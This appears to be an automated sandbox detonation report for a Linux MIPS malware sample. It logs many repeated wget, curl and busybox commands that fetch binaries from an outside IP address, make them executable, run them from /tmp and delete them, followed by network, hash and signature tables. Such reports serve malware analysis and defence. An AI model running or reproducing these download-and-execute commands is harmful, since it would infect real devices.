/usr/bin/curl
[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/chmod
[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/bin/rm
[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]
/usr/bin/wget
[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/chmod
[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/bin/rm
[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]
/usr/bin/wget
[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/chmod
[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/bin/rm
[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]
/usr/bin/wget
[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/chmod
[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/bin/rm
[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]
/usr/bin/wget
[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/chmod
[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/bin/rm
[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]
/usr/bin/wget
[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/chmod
[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/bin/rm
[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]
/usr/bin/wget
[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/chmod
[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/bin/rm
[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]
/usr/bin/wget
[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/chmod
[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/bin/rm
[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]
/usr/bin/wget
[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/chmod
[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/bin/rm
[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]
/usr/bin/wget
[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/chmod
[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/bin/rm
[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]
/usr/bin/wget
[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/chmod
[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/bin/rm
[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]
/usr/bin/wget
[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/chmod
[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/bin/rm
[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]
/usr/bin/wget
[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/chmod
[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/bin/rm
[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]
/usr/bin/wget
[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/chmod
[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
/bin/rm
[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:30
Reported
2024-10-21 01:33
Platform
debian9-mipsel-20240729-en
Max time kernel
72s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA | N/A |
| N/A | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz | N/A |
| N/A | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb | N/A |
| N/A | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
| N/A | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq | N/A |
| N/A | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N | N/A |
| N/A | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj | N/A |
| N/A | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly | N/A |
| N/A | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m | N/A |
| N/A | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 | N/A |
| N/A | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT | N/A |
| N/A | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp | N/A |
| N/A | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ | N/A |
